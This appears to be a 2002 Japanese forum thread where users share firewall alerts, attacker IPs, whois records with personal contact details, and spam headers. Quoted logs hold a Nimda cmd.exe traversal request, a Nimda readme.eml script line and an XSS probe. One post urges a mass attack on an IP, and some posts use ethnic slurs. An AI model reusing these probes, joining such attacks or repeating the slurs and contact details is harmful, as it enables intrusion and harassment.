mnt-by: MAINT-KR-DACOM
changed: [email protected] 20010307
source: APNIC

role: DACOM BORANET
address: DACOM Bldg., 706-1, Yoeksam-dong, Kangnam-ku, Seoul
phone: +82-2-6220-7755
fax-no: +82-2-6220-0706
e-mail: [email protected]
admin-c: TH45-AP
tech-c: EJL1-AP
nic-hdl: DB50-AP
remarks: IP address administrator group of NIC team, DACOM Corp.
notify: [email protected]
mnt-by: MAINT-KR-DACOM
changed: [email protected] 20011009
source: APNIC

person: Inbum Lee
address: 1516-7 Shinrim9-dong Kwanak-gu
address: SEOUL Korea
country: KR
phone: +82-2-871-5001
e-mail: [email protected]
nic-hdl: IL70-AP
mnt-by: MAINT-KR-DACOM
changed: [email protected] 20010307
source: APNIC

218.148.24.235

こいつが突っついてる
203.182.242.150

IP: 61.205.33.126
DNS: fl-tky02-p126.alpha-net.ne.jp

毎日来る。
Nimdaに感染してる。

ゲヒョヒョヒョヒョヒョ

キヒヒヒヒヒ

62.64.200.57 Ping Attack

**アクセス元： 203.197.92.82
**攻撃方法： SCAN-SYN FIN scan

**アクセス元： 217.230.55.40
**攻撃方法： Port scan attempt

**アクセス元： 218.48.88.108
**攻撃方法： Back Orifice
ウゼェ

それは全部洩れだ
IPアドレス偽装っていうのをしらないようだな(藁

Norton Personal Firewall 検出

Date: 2002/01/20 Time: 11:45:06
Security alert displayed for rule Default Block NetBus Trojan horse.
Remote computer (211.223.51.150, 1378)

inetnum: 211.216.0.0 - 211.225.255.255


netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center
country: KR
admin-c: DL276-AP
tech-c: WK81-AP
remarks: ******************************************
remarks: Allocated to KRNIC Member.
remarks: If you would like to find assignment
remarks: information in detail please refer to
remarks: the KRNIC Whois Database at:
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20000901
changed: [email protected] 20000912
changed: [email protected] 20010627
source: APNIC

person: Dongjoo Lee
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: DL276-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

俺のとこにも来たョ　211.199.225.189

IP: 200.226.227.182
Node: MASTER
Group: WORKGROUP
NetBIOS: MASTER 
MAC: 444553540000
DNS: 182.227.226.200.in-addr.arpa.ig.com.br
アタッカは、トロイの木馬プログラム SubSeven が有効かどうか調べようとしています。

217.109.154.28
（ﾟ∀ﾟ）ｱﾋｬﾋｬ

211.56.136.183　　
こいつが毎日ウィルスを送ってくる・・・。

最近よく叩かれるポート

　80　111　515

最近たまーに叩かれるポート

25
・・・そんなになんか送りたいんかゴルァ！！

最近ぜんぜんたたかれないポート

●んこ
・・・そんなに臭いかゴルァ！！

いつもネットに繋いだ瞬間216.234.161.75がゾーンアラームに引っかかる。

日付: 02/01/22 時刻: 7:41:44
今回 1 回だけﾕｰｻﾞｰが選択したのは 「ﾌﾞﾛｯｸ」 通信｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ ICMP 要求
ﾘﾓｰﾄｱﾄﾞﾚｽ､ｻｰﾋﾞｽは www.google.com,http
ﾌﾟﾛｾｽ名は XﾀpﾂXﾀpﾂ

12345と12346　Netbus放置

最近ﾁｮｿがUzeeeeeeee！

ケイディディ株式会社 (KDD Corporation)
SUBA-035-73 [サブアロケーション] 211.4.178.0
柴田書店 (Shibata Publishing Co. Ltd.)
SHIBATA-NET [211.4.178.200 <-> 211.4.178.207] 211.4.178.200/29

Name: adsl-ull-185-69.42-151.net24.it
Address: 151.42.69.185

ログ一面こいつだらけ

61.207.72.63
p2063-ipad02sapodoori.hokkaido.ocn.ne.jp

ここ１時間の間に５〜６回トロイを送りつけられそうになりました

203.158.128.231

>>139
スゴイなぁ。知らない間にP2Pでファイル転送されてるのかなぁ？
僕もトロイ送りつけてもらいたいんですが、方法を教えてください。

http://isweb39.infoseek.co.jp/play/aomanga/index.html　　　

日付: 02/01/23 時刻: 21:26:55
規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 のｾｷｭﾘﾃｨ警告を表示しました
ﾘﾓｰﾄｺﾝﾋﾟｭｰﾀ (211.227.231.20､ 3456

61.125.103.1
zaq3d7d6701.zaq.ne.jp

Name: nszx104.128.szptt.net.cn
Address: 202.104.128.164
中国からだよ…

＞353 名前：●~* lo;んーかどle; ：02/01/24 10:39
＞>352
＞脆弱かどうかここをハックしてみてね。
＞211.6.100.162
＞だだーし、アクセスした場合は此処でＩＰ晒します。

旧Mac板で暴れている基地外です。こちらの住人で暇な方、相手してあげて下さい。
http://pc.2ch.net/test/read.cgi/jobs/1009512244/353

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.6.96.0-211.6.103.0
b. [ネットワーク名] E-CATV
f. [組織名] 株式会社愛媛シーエーティヴィ
g. [Organization] EHIME CATV CO.,LTD.
m. [運用責任者] YS3054JP
n. [技術連絡担当者] AM857JP
p. [ネームサーバ] ns.e-catv.ne.jp
p. [ネームサーバ] ns-tk013.ocn.ad.jp
y. [通知アドレス]
[割当年月日] 2000/01/25
[返却年月日]
[最終更新] 2000/01/26 19:40:57 (JST)
[email protected]

ここで晒してどうなるの？ただの自己満？

日付: 02/01/24 時刻: 11:57:05
規則「Default Block Back Orifice 2000 Trojan」が ****,Back-Orifice をﾌﾞﾛｯｸしました｡詳細:
ｲﾝﾊﾞｳﾝﾄﾞ UDP ﾊﾟｹｯﾄ
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ****,Back-Orifice
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.211.153.38,31338
ﾌﾟﾛｾｽ名は N/A

211.108.56.159
211.44.107.12

未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 61.177.27.134,http←ﾆﾑﾀﾞ

>>140
プロバイダーはJ−COM。
ルーターをかまさずネットにつなぐ。

211.211.153.38

また韓国だよ･･･

わかったからあげんな

いつもチョンとチュンばっか・・・・。ばっか！

Received: from 24-148-67-115.na.21stcentury.net(24.148.67.115) by
smtp-gw.biglobe.ne.jp with SMTP;***+0900(JST)
From:"Ideas4u"< [email protected] >
Date:***
To: [email protected]
Subject:500 IDEAS to start your own Internet business
Message-ID:*
--
Do you want to put the power of the Internet to work for you,
but can't come up with that one profitable idea?
We're offering a first ever list of 500 new and innovative ideas
that you can instantly download
http://store.yahoo.com/ideas4u-store/index.html
-----
You received this e-mail because we are on a mutual safelist.
To REMOVE yourself from this list please follow the instructions
at the end of this email or send a blank email to
this list( [email protected] ) using the word "unsubscribe" as a header.

mail1.21stcentury.net (pri=0)
<220 mail1.21stcentury.net ESMTP
>HELO rlytest.nanet.co.jp
<250 mail1.21stcentury.net
>MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
<250 ok
>RCPT TO:<[email protected]>
<553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
正常：中継は拒否されました。
--
checkhouston.net
sitemail.everyone.net (pri=0)
<220 imta03.mta.everyone.net ESMTP Postfix
>HELO rlytest.nanet.co.jp
<250 imta03.mta.everyone.net
>MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
<250 Ok
>RCPT TO:<[email protected]>
<554 <[email protected]>: Recipient address rejected: Relay access denied (MTA:imta03)
正常：中継は拒否されました。

＞２１４
同じ奴からきた。
ノートンで検出
IP61.79.232.159
トロイ使って侵入してくる模様。
要注意。

inetnum: 61.78.0.0 - 61.85.255.255
netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center
country: KR
admin-c: DL276-AP
tech-c: WK81-AP
remarks: ******************************************
remarks: Allocated to KRNIC Member.
remarks: If you would like to find assignment
remarks: information in detail please refer to
remarks: the KRNIC Whois Database at:
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20010511
changed: [email protected] 20010627
source: APNIC

person: Dongjoo Lee
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: DL276-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

person: Won Kang
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: WK81-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

http://61.79.232.159/../<script>alert('sagi')</script>

211.211.153.38 (ｗ

198.142.214.98
　　　 ↓
sdcax45-098.dialup.optusnet.com.au

http://sdcax45-098.dialup.optusnet.com.au

zoneが感知した。
うざすぎ

198.142.200.5

まただよ。
死ねって感じだね。

nslookup 203.80.255.36


Name: 203080255036.ctinets.com
Address: 203.80.255.36

http://adsl-64-219-188-148.dsl.rcsntx.swbell.net

210.164.0.239
yzm0677.yzmcr2.thn.ne.jp
p27-dn03simizu.kumamoto.ocn.ne.jp

http://chance.gaiax.com/home/hana_sakura14/main

↑見た人感想聞かせて

61.188.207.244

inetnum: 61.188.0.0 - 61.188.255.255
netname: CHINANET-SC
descr: CHINANET Sichuan province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: XS16-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-SC
changed: [email protected] 20010315
source: APNIC

person: Xiaodong Shi
address: No.72,Wen Miao Qian Str.
address: Data Communication Bureau Of Sichuan Province
address: Chengdu
address: PR China
country: CN
phone: +86-28-6130055
fax-no: +86-28-6151287
e-mail: [email protected]
nic-hdl: XS16-AP
mnt-by: MAINT-CHINANET-SC
changed: [email protected] 19990811
source: APNIC

某中学校
210.253.0.241

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 203.174.74.0 - 203.174.74.127
netname: DH-MAILIN
descr: M@ilin, LTD.
descr: 21F Shibuya Mark City West
descr: 1-12-1 Dogenzaka Shibuya-ku
descr: 150-0043, Tokyo, Japan
country: JP
admin-c: NY16-AP
admin-c: KK110-AP
admin-c: MK77-AP
tech-c: NY16-AP
tech-c: KK110-AP
tech-c: MK77-AP
mnt-by: MAINT-JP-EDGE-JP
changed: [email protected] 20010601
source: APNIC

person: Noriyuki Yamazaki
address: 3-3-5 Shibuya Shibuya-ku Tokyo
address: 150-0002
country: JP
phone: +81-3-5766-7211
fax-no: +81-3-5766-7221
e-mail: [email protected]
nic-hdl: NY16-AP
mnt-by: MAINT-JP-EDGE-JP
changed: [email protected] 20000822
source: APNIC

person: Kei Kato
address: Morimo Building 4F,
address: 3-3-5, Shibuya, Shibuya-ku,
address: Tokyo, 150-0002, Japan
country: JP
phone: +81-3-5749-9621
fax-no: +81-3-5749-9910
e-mail: [email protected]
nic-hdl: KK110-AP
mnt-by: MAINT-JP-EDGE-JP
changed: [email protected] 20010104
source: APNIC

person: Mayumi Koshimizu
address: 3-3-5, Shibuya, Shibuya-ku,
address: Tokyo, 150-0002
country: JP
phone: +81-3-5766-7211
fax-no: +81-3-5766-7221
e-mail: [email protected]
nic-hdl: MK77-AP
mnt-by: MAINT-JP-EDGE-JP
changed: [email protected] 20000822
source: APNIC

日付: 02/01/25 時刻: 23:12:43
規則「Default Block NetBus Trojan」が ****,NetBus をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ****,NetBus
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.170.160.185,2663
ﾌﾟﾛｾｽ名は N/A

193.251.185.168
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

European Regional Internet Registry/RIPE NCC (NETBLK-RIPE)
These addresses have been further assigned to European users.
Contact info can be found in the RIPE database, via the
WHOIS and TELNET servers at whois.ripe.net, and at
http://www.ripe.net/perl/whois/
NL

Netname: RIPE-CBLK
Netblock: 193.0.0.0 - 193.255.255.255
Maintainer: RIPE

Coordinator:
Reseaux IP European Network Co-ordination Centre Singel 258 (RIPE-NCC-ARIN) [email protected]
+31 20 535 4444

Domain System inverse mapping provided by:

NS.RIPE.NET 193.0.0.193
NS.EU.NET 192.16.202.11
AUTH03.NS.UU.NET 198.6.1.83
NS2.NIC.FR 192.93.0.4
SUNIC.SUNET.SE 192.36.125.2
MUNNARI.OZ.AU 128.250.1.21
NS.APNIC.NET 203.37.255.97

To search on arbitrary strings, see the Database page on
the RIPE NCC website at http://www.ripe.net/perl/whois/

Record last updated on 16-Oct-1998.
Database last updated on 24-Jan-2002 19:56:53 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

age

ここの150をよろしくお願いします。
http://news.2ch.net/test/read.cgi/newsplus/1011888354/

>>18
ﾀｲｰﾎ（！

61.83.196.184
ここから攻撃を受けた。

From:AMERIONE MASTERCARD< [email protected] >
To: [email protected]
Subject:Friend,100% Guaranteed Approval!
Date:***
Received:from[205.244.70.4]by sitemail.everyone.net with ESMTP id **
Received: from lsmail1 (216.242.16.45) by lsmail4.opthome.com (LSMTP for Windows NT v1.1b) with SMTP id < [email protected] >
From [email protected]
---
Get your AmeriOne MasterCardｮ here. It is 100% Guaranteed Approval. You can receive card limit up to $7500 with,
- O% interest - No Credit Check - No late Charges - No Checking account required
The e-mail subscription address is: [email protected]
To unsubscribe please click here. or Send an email with remove as the subject to [email protected]

43.233.25.228

Japan Inet (NET-JAPAN-A)
JP

Netname: JAPAN-A
Netblock: 43.0.0.0 - 43.255.255.255

Coordinator:
Murai, Jun (JM292-ARIN) [email protected]
+81 466 47 5111 ext. 3330 ext. 3330

Domain System inverse mapping provided by:

NS1.V6NIC.NET 210.134.160.187
NS2.V6NIC.NET 210.134.160.188

Record last updated on 27-Sep-2001.
Database last updated on 25-Jan-2002 19:56:21 EDT.

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 61.248.0.0 - 61.255.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP
remarks: ******************************************
remarks: KRNIC is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the KRNIC Whois DB
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20010321
changed: [email protected] 20010606
source: APNIC

person: Host Master
address: Korea Network Information Center
address: Narajongkeum B/D 14F, 1328-3, Seocho-dong, Seocho-ku, Seoul, 137-070, Republic of Korea
country: KR
phone: +82-2-2186-4500
fax-no: +82-2-2186-4496
e-mail: [email protected]

inetnum: 61.186.0.0 - 61.186.63.255
netname: CHINANET-HI
descr: CHINANET Hainan province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: LZ8-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CN-CHINANET-HI
changed: [email protected] 20010307
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: liuqing zheng
address: HAINAN DATA COMMUNICATION BUREAU
address: HaiXiu road NO.46
address: HaiKou HaiNan province CHINA
country: CN
phone: +86-898-6769607
fax-no: +86-898-6769427
e-mail: [email protected]
nic-hdl: LZ8-AP
mnt-by: MAINT-CN-CHINANET-HI
changed: [email protected] 20010122
source: APNIC

こいつが、俺のPCに進入しようとしました。皆さん、総攻撃してください。
202.212.27.250

>>178
あんたプロバイダ InfoSphere 使ってるだろ。

>>177
ここ数日うちにも来てるＹＯ！

こんなヤツがアタックしてきたよ。

IP: 61.116.134.254
Node: みつる
NetBIOS: WORKGROUP 
Group: WORKGROUP
MAC: 444553547777
DNS: N72ch-01p254.ppp11.odn.ad.jp

43.227.240.13

こいつマジでウザイ。

IP: 61.116.136.18
Node: APCHAN
Group: WORKGROUP
MAC: 444553547777
DNS: KKRfa-01p1-18.ppp11.odn.ad.jp

昨日から５０回くらいアタックしてきてる。
ヒマなのね〜。

Domain Information: [ドメイン情報]
[Domain Name] 1ST-COM.JP

[登録者名] 岡山　誠治
[Registrant] OKAYAMA Seiji

[Name Server] auth320.ns.uu.net
[Name Server] auth100.ns.uu.net

[登録年月日] 2001/09/25
[有効期限] 2002/09/30
[状態] Active
[最終更新] 2001/11/22 20:42:54 (JST)

Contact Information: [公開連絡窓口]
[名前] 岡山　誠治
[Name] OKAYAMA Seiji
[Email] [email protected]
[郵便番号] 106-0032
[住所] 東京都港区六本木5-1-3
ゴトウビルディング1st7F
[Postal Address] 7F GOTO BUILDING 1st.
5-1-3 ROPPONGI MINATO-KU
TOKYO, JAPAN
[電話番号] 03-5772-3005
[FAX番号] 03-5772-3006

Domain Information: [ドメイン情報]
a. [ドメイン名] JANE.CO.JP
e. [そしきめい] ゆうげんがいしゃじぇいん
f. [組織名] 有限会社ジェイン
g. [Organization] JANE LIMITED COMPANY
k. [組織種別] 有限会社
l. [Organization Type] Limited Company
m. [登録担当者] TT2142JP
n. [技術連絡担当者] TT2142JP
p. [ネームサーバ] ns.jane.co.jp
p. [ネームサーバ] ns.join-am.ne.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/03/31)
[登録年月日] 1999/04/14
[接続年月日] 1999/06/08
[最終更新] 2000/11/21 17:43:15 (JST)
[email protected]


Personal Information: [個人情報]
a. [JPNICハンドル] TT2142JP
b. [氏名] 高橋泰一郎
c. [Last, First] Takahashi, Taiichiro
d. [電子メイル] [email protected]
f. [組織名] 有限会社ジェイン
g. [Organization] JANE LIMITED COMPANY
k. [部署]
l. [Division]
m. [肩書] 代表取締役
n. [Title] President
o. [電話番号] 0462-20-5666
p. [FAX番号] 0462-20-5667
y. [通知アドレス] [email protected]
[最終更新] 2000/11/17 17:10:47 (JST)
[email protected]

うざすぎ1分に1回ツンツンすなっ

日付: 02/01/26 時刻: 23:38:40
未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.132.19.8,http

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.132.16.0-211.132.31.0
b. [ネットワーク名] DOLPHIN
f. [組織名] 株式会社ドルフィンインターナショナル
g. [Organization] Dolphin International Inc.
m. [運用責任者] SY090JP
n. [技術連絡担当者] SM142JP
p. [ネームサーバ] ns1.din.or.jp
p. [ネームサーバ] ns2.din.or.jp
y. [通知アドレス] [email protected]
[割当年月日] 2000/09/25
[返却年月日]
[最終更新] 2000/10/25 11:44:05 (JST)
[email protected]

CHINANET Hainan province network
↑
こいつ経由が多いな。

61.134.169.135
61.210.180.93
203.115.228.16
213.245.13.211

あほ。

以上。

204.247.157.133
個人撮影と思われるオリジナルのエロ画像・動画発見、おすすめ（藁）

61.225.169.156

攻撃をとかアタックをって言ってる奴にいいたい。
ﾎﾝﾄにそうか？何をもってしてそういっているんだ？
FWに引っかかった＝攻撃
じゃないよ？

ほ
ほ
ほ
ほ
ほ
ほ
ほ
ほ
ほ
ほ

意味なし

　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　


　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　▓

リモートアドレス：２１０，２２１，２２６，２０２
ローカルアドレス：oem computer 211,5,29,174

ﾌﾟﾛﾄｺﾙ：TCP（ｲﾝﾊﾞｳﾝﾄﾞ）
ﾘﾓｰﾄｱﾄﾞﾚｽ：２１１，２２８，４０，１５４：６１２４１
ﾛｰｶﾙｱﾄﾞﾚｽ：２１１，１８，２４，１１８：２７３７４
ﾘﾓｰﾄｺﾝﾋﾟｭｰﾀｰ：２１１，２２８，４０，１５４

ttp://www.yamaga.com/

日付: 2002/01/27 時刻: 18:08:05
ｱﾄﾞﾚｽ 61.43.64.44 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

日付: 2002/01/27 時刻: 19:00:48
ｱﾄﾞﾚｽ 68.52.214.119 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

これってもしかして攻撃されとる？

2002/01/27(18:55:37) W-SV 218.139.22.103 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 218.139.22.103 "/scripts/..%2f../winnt/system32/cmd.exe" ]"

2002/01/27(16:59:59) W-SV 218.27.200.18 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 218.27.200.18 "/scripts/..%2f../winnt/system32/cmd.exe" ]"

ただのニムダ

(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b
(≧∇≦)b (≧∇≦) b(≧∇≦)b (≧∇≦) b

日付: 2002/01/27 時刻: 22:42:30
規則「NetBus ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断」が ****,NetBus を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ****,NetBus
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.205.211.183,3548

IP: 61.125.111.141
Node: KEI-VBUFGT69S9X
NetBIOS: ADMINISTRATOR 
Group: WORKGROUP
DNS: zaq3d7d6f8d.zaq.ne.jp
MAC: 0090CCA58AF7

61.198.57.56
ほぼ１分に１回の割合。もう１時間くらい来てる。
超ウザ。

% Rights restricted by copyright. See ttp://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

Southwestern Bell (NET-SBIS)
2701 W. 15th St.
PMB 236
Plano, TX 75075
US

Netname: SBIS
Netblock: 151.164.0.0 - 151.164.255.255
Maintainer: SBIS

Coordinator:
Southwestern Bell Internet Services (ZS44-ARIN) [email protected]
888-212-5411

Domain System inverse mapping provided by:

NS1.SWBELL.NET 151.164.1.1
NS2.SWBELL.NET 151.164.1.7

Record last updated on 05-May-2000.
Database last updated on 27-Jan-2002 19:56:09 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

ふざけるな

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

IP: 61.207.86.194
Node: 05RUNGWAXQ9L3AN
Group: WORKGROUP
MAC: 444553547777
DNS: p4194-ipad01souka.saitama.ocn.ne.jp

こういうのにカウンターかますツールって無いんですか？

>>211
>>86のリンク先にあるじゃねぇか

ニュートン系では太陽系を逆に回転させても万有引力の式は成り立つ。

光をプリズムでスペクトル拡散させても、もう一度プリズムと通せばもとの光になる。

このことから時間は可逆であるとされていた。

しかし１９世紀に入り物理学の焦点が力学から熱力学に移り、エントロピーの第２法則が論壇にあがるよう になると、機械的世界観の立場から時間の不可逆性を打ち出した。

こうしたことを物理では「時間の可逆性」、「時間の対象性」などというが、時間は決して戻らない。映画 スーパーマンでスーパーマンが地球を逆回転させて、死んだヒロインを生き返らせてしまうシーンがある が、現実の世界ではありえないのである。

あったのは「回転の可逆性」と「拡散の可逆性」であり「時間の 可逆性」ではないのである。

その後の研究で、時間を不可逆だとする人たちが２つに分かれた。

時間とともにエネルギーは組織だった構造を失っていくとした考えと、時間とともに組織化していくといっ た考えの違いである。

その前者に入るのが散逸構造論だ。

そもそも時間など存在するのか？プロセスと存在の実否は別次元の問題である。

まるで光の存在の古典問題を無視してない？

>>213-216
誤爆？なにげに仕事に関連した話題なんで
真剣に読んだけど（ﾜﾗ

ＮＥＴ−ＶＲＩＯ
ＵＳ
2分おきに12回、こういうのはほうっておいてもいい？

>>217
それはなんだ？？ NetBIOS名？ノード名？プロバイダ？

10.4.12.1.
こいつが、攻撃をしかけてきた！！

>>219
そんな短いの初めて見た

>>219
どんな攻撃をしかけてきたんだ！！

2CHみてると210.138.144.1に繋がるんだけど、なんなの？

>>222
210.138.144.1　＝　www01.dd.iij4u.or.jp
２ｃｈのバナーかそんなとこか

（・∀・）きゃ！

211.192.93.76
木馬らしい。

ξ　←ﾁﾝゲ

9/01/2002 22:42:37.944196 tun0 @100:23 b ******.prodigy.net.mx,3460 -> *******.ap.plala.or.jp,1214 PR tcp len 20 48 -S IN

昨日あたりから、ずっとこんな調子なんだが

TCP PORT 1214って何？

>>227
Morpheus or KaZaA peer to peer music/file sharing
http://www.ec11.dial.pipex.com/port-num1.shtml

>>227
TCP 1214 KAZAA
KaZaA is a completely distributed peer-to-peer file sharing service.
だってさ。

>>228, >>229 Thanks
ファイル共有アプリね。

>>226
ﾜﾗﾀ

知られてしまった

>>226
なんか枝毛だね。

また来やがったマジうざい
203.174.74.14
http://www.edge.co.jp/who/staff_koshimizu.html

63.253.253.72
ウザ

64.242.116.6
これどこのIP？

>>236
アメリカ　シアトル

日付: 2002/01/30 時刻: 15:35:13
規則「Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断」が 211.1.53.70,27374 を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.1.53.70,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.44.29.189,2887

日付: 2002/01/23 時刻: 16:24:38
ﾎﾟｰﾄｽｷｬﾝをｱﾄﾞﾚｽ 147.208.171.139 から検出しました｡
少なくとも精査中の 6 個のﾎﾟｰﾄの検出後に以降のｱｸｾｽを 30 分間遮断しました｡
ﾌﾟﾛｾｽ名は N/A

日付: 2002/01/09 時刻: 20:16:02
規則「Senna Spy ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断」が 211.1.53.56,13000 を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.1.53.56,13000
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 131.211.65.201,13000
ﾌﾟﾛｾｽ名は N/A

日付: 2002/01/30 時刻: 15:10:09
規則「NetBus ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断」が 211.1.53.70,NetBus(12345) を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.1.53.70,NetBus(12345)
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.244.131.128,1089
ﾌﾟﾛｾｽ名は N/A

っっっっっっっっっっっっｂ

